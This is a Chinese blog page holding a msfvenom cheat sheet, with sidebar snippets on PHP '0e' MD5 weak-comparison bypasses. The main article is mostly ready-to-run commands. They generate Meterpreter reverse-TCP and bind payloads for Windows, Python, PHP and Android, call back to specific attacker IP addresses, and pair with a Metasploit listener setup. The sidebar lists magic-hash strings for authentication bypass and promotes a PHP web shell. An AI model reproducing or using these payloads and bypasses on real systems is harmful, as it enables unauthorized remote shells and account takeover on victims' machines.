php0e,0e0w

最新推荐文章于 2023-11-20 18:40:45 发布
最新推荐文章于 2023-11-20 18:40:45 发布
阅读量119 收藏
点赞数
文章标签: php0e

这是一篇关于msfvenom文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2020年6月4日,最近一次更新时间为2020年9月15日。本文会不定期更新。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。

关于什么是msfvenom?更多详细内容见 msfvenom官网和如何使用。

0x01 msfvenom概述

基础介绍

msfvenom一般需要配合msf进行利用。使用msfvenom生成shellcode,使用msf进行监听,在靶机上运行shellcode。msfvenom几乎支持生成各种平台的shellcode。是后渗透测试过程中强大的武器之一。

安装方式

msfvenom是msfpayload和msfencode的组合,安装msf之后便可使用。

一键安装msf

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && ./msfinstall

更新msf

sudo msfupdate

0x02 msfvenom命令

msfvenom -h #查看帮助

msfvenom -l payloads #查看支持生成的payload

msfvenom -l archs #查看支持的系统架构

msfvenom -l platforms #查看支持的平台

msfvenom -l encrypt #查看所有的加密方式

msfvenom -l encoders #查看所有的编码器

例:

msfvenom -a 系统架构 –platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp lhost=111.231.228.112 lport=6059 -i 3 -e x86/shikata_ga_nai -f exe -o x86reverse_tcp.exe

0x03 msfvenom利用

MSF监听器

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp #设置成payload的模式

set rhost 111.111.111.112

set lport 6095

exploit -j

sessions操作

sessions -i 2

shell

Windows exe

靶机无公网ip

msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f exe -o x86reverse_tcp.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f exe -o x64reverse_tcp.exe

靶机有公网ip

msfvenom -p windows/x64/meterpreter/bind_tcp lport=6095 -f exe -o bind_tcp.exe

Linux elf

Python

靶机无公网ip

msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f py -o x86reverse_tcp.py

靶机有公网ip

msfvenom ­-p windows/x64/meterpreter/bind_tcp lport=6095 ­-f py -o exp.py

PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=111.111.111.112 LPORT=6095 -f raw -o session.php

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=111.111.111.112 LPORT=80 -o msf.apk

apple_ios

0x04 参考链接

https://blog.csdn.net/caiqiiqi/article/details/84102629

小申是个数学家
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
E-w0rm | PHP Shell-开源
04-15
E-w0rm:是一个功能强大的shell,具有诸如文件管理器,密码更改,数据库管理器,绑定shell,远程shell,远程上传,编辑,chmod,删除,make,autoroot,php代码执行,服务器命令执行,过程之类的便捷功能经理......
e-vent
03-07
docker run --rm -v $(pwd):/opt -w /opt laravelsail/php80-composer:latest composer install 4-环境变化综合分析 cp .env.example .env 5-Criar atalho paranãodigitar'./vendor/bin/sail'toda vez alias sail...
PHP比较漏洞, 代码审计, 字符串数字, “0e“字符串, 布尔值比较, 极限值, switch比较, in_array比较
最新发布
探测???
11-20 326
PHP 中,当一个字符串与数字进行比较时,如果字符串不是以数字开始,则该字符串会被转换为数字 0。在这个例子中,字符串 “1admin” 在尝试转换为数字时,会被解析为数字 1,因为它以 1 开始,忽略后续非数字字符。这是预防某些类型的定时攻击的重要特性,例如,在一些安全关键的应用场景中,所以,0 == 1 是 false。这是因为 e 后面的数字被解释为指数,但由于前面的数字是 0,所以整个表达式的值为 0。因为 e 后面的数字被解释为指数,但由于前面的数字是 0,所以整个表达式的值为 0。
CTF:PHP MD5函数0E绕过漏洞
06-01 1万+
CTF:PHP MD5函数0E绕过漏洞 作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.1 8:43 背景 昨天参加了一场CTF线上赛,面对行业内的安全强队,比赛成绩相差巨大。通过这次比赛,找到了差距,找到了不足,更增长了知识。子曰:“学而不思则罔,思而不学则殆。”计划将经后每次比赛,解题过程中的困惑、思路、整理后分享出来,以达起到巩固知识,也便于帮助有需要的人。因个人能力所限,文中难免会有错误,不妥之处还请批评指正。 赛题源码 ...
php 字符串显示e,PHP处理0e开头md5哈希字符串缺陷(小结)
weixin_39624332的博客
03-10 393
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。因此我们可以利用这一漏洞,通过输入一个经过哈希后以”0E”开头的字符串,即会被PHP解释为0,如果数据库中存在这种哈希值以”0E”开头的密码的话,他就可以以这个用户的身份登录进去,尽管...
PHP安全相关知识
热门推荐
wanan的博客
10-07 1万+
PHP安全相关知识
php0e若等于原理,PHP原理之异常机制解析
weixin_30305727的博客
03-26 337
这篇文章主要为大家详细介绍了PHP原理之异常机制解析,具有一定的参考价值,可以用来参考一下。感兴趣的小伙伴,下面一起跟随512笔记的小编小韵来看看吧!PHP的异常机制的原理是什么?在PHP每一个可独立执行的op array最后的ZEND_HANDLE_EXCEPTION是用来干什么呢?让我们从一个问题说起, 上周的时候, blue5tar提了一个问题:”对于下面的代码, one rror明明执行了...
PHP 代码自动生成工具 e-World Tech PHPMaker 2020.0.3 英文特别免费版.rar
05-10
PHPMaker 是由 e.World Technology 开发的 PHP 代码自动生成工具。它是一款在 Windows 平台上运行的基于 MYSQL 数据库自动生成 PHP 脚本的软件。使用生成的 PHP 代码,你可以通过 WEB 网页对数据库的记录进行浏览、...
B_E3119081_Danamukti-Satrio-W_WEB
03-15
B_E3119081_Danamukti-Satrio-W_WEB
e-commerce-back
03-05
关于Laravel ... Laracasts包含1500多个视频教程,涉及各种主题,包括Laravel,现代PHP,单元测试和JavaScript。 深入我们全面的视频库,提高您的技能。 Laravel赞助商 我们要感谢以下赞助商为Laravel开发
0e php若类型,0e开头MD5 python生成脚本 PHP哈希弱类型比较缺陷
weixin_35381903的博客
03-29 191
MD5弱类型比较在代码审计当中经常见到,所以写了一个python脚本,有事没事跑一下,积累一些字符串。网上大多都是看到《0e开头MD5值小结》这篇文章,这里希望给大家一个可自定义字符的自动化脚本,方便大家。如果有更多的字符串,欢迎留言。 1、什么是PHP哈希弱类型比较缺陷PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不...
PHP处理0e开头md5时hash字符串漏洞
大方子
05-10 1754
在下面的代码中我们可以看到通过md5加密得到的哈希值类型都属于字符串型 在PHP中,利用”!=”或”==”来对哈希值进行比较时,PHP会把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 以下纯数字和大写字母类型的哈希值在比较时都为0 纯数字类: 240610708 0e4620974...
第2章 基本语法
zqbgds的博客
06-23 247
一、在Web页面中嵌入PHP代码的集中风格 常规风格 <?php   echo "我的第一个PHP程序!"; ?>
PHP处理0e开头md5哈希字符串bug
bestlzk的博客
09-15 3670
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0, 所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。   关于PHP hash比较缺陷详细介绍:http://www.freebuf.com/news/67007.html   QNKCDZO 0e
php 0e 0x,0e开头md5汇总
weixin_32384503的博客
03-26 821
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。关于PHP hash比较缺陷详细介绍:http://www.freebuf.com/news/67007.html0x01 md5(str)1234567891011121314151...
【CTF】PHP Hash漏洞(关于0e开头的md5值)
HAPPY
07-30 1万+
原题(PHP代码分析溯源) &lt;?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;&amp; $md51 == $md52) {     echo "nctf{*****************}"; } else {     ec...
PHP处理0e开头md5哈希字符串缺陷/bug & PHP expresses two different strings to be the same [duplicate]
ncafei的博客
03-17 3566
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
PHP处理0e开头md5哈希字符串缺陷/bug
weixin_42478365的博客
04-10 395
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 关于PHP hash比较缺陷详细介绍:http://www.freebuf.com/news/67007.html 0x01 md5(str) QNKCDZO 0e830400451993494058024219903391 s878926199a 0e54599327451770903
输出 php hex2bin( "0ab3020a22736974652f6170695f6d6573736167655f636865636b537461" . "7475732e70726f746f12047369746522570a1c4170694d65737361676543" . "6865636b53746174757352657175657374120e0a066d7367496473180120" . "03280912270a08726f6f6d5479706518022001280e32152e636f72652e4d" . "657373616765526f6f6d54797065224c0a1d4170694d6573736167654368" . "65636b537461747573526573706f6e7365122b0a0e7374617475734d6573" . "736167657318012003280b32132e636f72652e5374617475734d65737361" . "676542580a13636f6d2e7a616c792e70726f746f2e736974655a2f676974" . "6875622e636f6d2f6475636b636861742f6475636b636861742d67617465" . "7761792f70726f746f2f73697465ca020f5a616c795c50726f746f5c5369" . "7465620670726f746f33" )
06-10
"\n\xb3\x02\n\"site/api_message_checkStatus.proto\x12\tsite\"W\n\x1cApiMessageCheckStatusRequest\x12\x0e\n\x06msgId\x18\x01\x20\x03(\t\"\x27\n\x08roomType\x18\x02\x20\x01(\x02\"L\n\x1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值